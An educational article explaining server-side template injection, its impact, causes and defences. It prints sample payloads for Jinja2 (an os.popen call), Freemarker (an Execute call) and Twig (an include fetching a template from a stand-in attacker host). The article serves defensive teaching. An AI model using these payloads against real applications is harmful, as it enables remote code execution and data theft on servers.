hugo template code
Sat Aug 12

SSTI: How to Secure Your Web Templates from Code Injection Attacks

Server-side template injection (SSTI) is a type of web security vulnerability that can allow attackers to execute arbitrary code on the server that runs an application. This can lead to serious consequences, such as data theft, server compromise, and even full system takeover.

In this article, we will explain what SSTI is, how it works, what impact it can have, how to prevent and detect it, and why it is important to know about it.

What is server-side template injection?

A template engine is a tool that helps developers create dynamic web pages by combining fixed templates with variable data. For example, a template engine can generate a personalized greeting message for each user by replacing a placeholder in the template with the user’s name.

Server-side template injection occurs when an attacker injects malicious input into a template that is processed by the server. The template engine then evaluates the input as part of the template syntax and executes it on the server. This can result in remote code execution (RCE), which means that the attacker can run any command on the server as if they had access to it.

For example, suppose a web application uses a template engine to generate an email confirmation message for users who sign up. The template looks something like this:

Hello {{user.name}}, thank you for signing up!

The application takes the user’s name from a form input and passes it to the template engine. However, the application does not validate or sanitize the input before passing it to the template engine. This means that an attacker can enter something like this in the form:

{{7*7}}

The template engine will then render the email message as:

Hello 49, thank you for signing up!

This shows that the template engine evaluated the expression 7*7 as part of the template syntax and executed it on the server. This is a simple example of server-side template injection. However, depending on the template engine and its configuration, an attacker can use more complex expressions or commands to achieve RCE on the server.

What can attackers do with SSTI?

The impact of SSTI attacks depends on several factors, such as the type and version of the template engine, the permissions and privileges of the server process, and the security measures implemented by the application. However, in general, SSTI attacks can have severe consequences for both the application and its users.

Some of the possible outcomes of SSTI attacks are:

  • Remote code execution: The attacker can run any command on the server as if they had access to it. This can allow them to install malware, steal sensitive data, modify or delete files, create backdoors, or launch further attacks on other systems.
  • Data theft: The attacker can access any data that is stored or processed by the server, such as user credentials, personal information, payment details, or confidential documents. They can also exfiltrate or leak this data to other servers or platforms.
  • Server compromise: The attacker can take over the server and use it for their own purposes. They can also escalate their privileges and gain access to other resources or services that are connected to the server.
  • Denial-of-service: The attacker can overload or crash the server by running resource-intensive or malicious commands. This can affect the availability and performance of the application and its users.

How do SSTI vulnerabilities arise?

SSTI vulnerabilities arise when user input is concatenated directly into a template rather than passed in as data. This allows attackers to inject arbitrary template directives in order to manipulatethe template engine, often enabling them to take complete control of the server.

Some of the common scenarios where SSTI vulnerabilities can occur are:

  • Unsanitized user input: The application does not validate or sanitize the user input before passing it to the template engine. This can allow the attacker to inject any template syntax that is supported by the template engine. For example, if the application uses Jinja2 as the template engine, the attacker can inject expressions like {{7*7}} or commands like {{config.__class__.__init__.__globals__['os'].popen('whoami').read()}} to execute code on the server.
  • Insecure configuration: The application does not configure the template engine properly and leaves some dangerous features enabled. For example, some template engines allow loading and executing external templates from arbitrary URLs. This can allow the attacker to create a malicious template on a remote server and inject a URL that points to it into the application’s template. For example, if the application uses Twig as the template engine, the attacker can inject something like {% include "http://attacker.com/evil.twig" %} to execute code on the server.
  • Outdated libraries: The application uses an outdated or vulnerable version of the template engine or its dependencies. This can allow the attacker to exploit some known bugs or vulnerabilities in the template engine or its components. For example, some older versions of Freemarker had a vulnerability that allowed arbitrary Java code execution via static method calls. This can allow the attacker to inject something like ${"freemarker.template.utility.Execute".?new()("whoami")} to execute code on the server.

How to prevent and detect SSTI attacks?

SSTI attacks can be prevented and detected by following some best practices for web security. Some of these are:

  • Validating input: The application should validate the user input before passing it to the template engine. It should check for any invalid or malicious characters or syntax that might indicate an SSTI attempt. It should also reject or sanitize any input that does not match the expected format or type.
  • Escaping output: The application should escape the output of the template engine before sending it to the client. It should encode any special characters or symbols that might be interpreted as HTML or JavaScript by the browser. This can prevent cross-site scripting (XSS) attacks that might leverage SSTI vulnerabilities.
  • Using secure templates: The application should use secure templates that do not allow arbitrary code execution or data access. It should also disable any dangerous features or functions that might be exploited by attackers. For example, some template engines provide sandboxing options that restrict what expressions or commands can be executed within a template.
  • Testing for vulnerabilities: The application should test for SSTI vulnerabilities regularly using automated tools or manual methods. It should scan for any potential injection points and try different payloads to see if they are executed on the server. It should also monitor and analyze the server logs and network traffic for any suspicious or anomalous activities.

Why is SSTI important to know?

SSTI is important to know because it is a common and serious web security vulnerability that can affect many web applications that use template engines. It can expose web applications and their users to various risks, such as data theft, server compromise, and denial-of-service. It can also be used as a stepping stone for other attacks, such as lateral movement, privilege escalation, or network reconnaissance.

Therefore, web developers and security professionals should be aware of SSTI and how to prevent and detect it. They should also keep up with the latest updates and patches for their template engines and their dependencies. They should also learn more about web security and how to protect their applications from other threats.

Conclusion

Server-side template injection is a web security vulnerability that can allow attackers to execute arbitrary code on the server that runs an application. It can have severe consequences, such as data theft, server compromise, and denial-of-service. It can also be used as a launchpad for other attacks.

SSTI vulnerabilities arise when user input is concatenated directly into a template rather than passed in as data. To prevent and detect SSTI attacks, web developers and security professionals should follow some best practices, such as validating input, escaping output, using secure templates, and testing for vulnerabilities. SSTI is important to know because it is a common and serious threat that can affect many web applications that use template engines.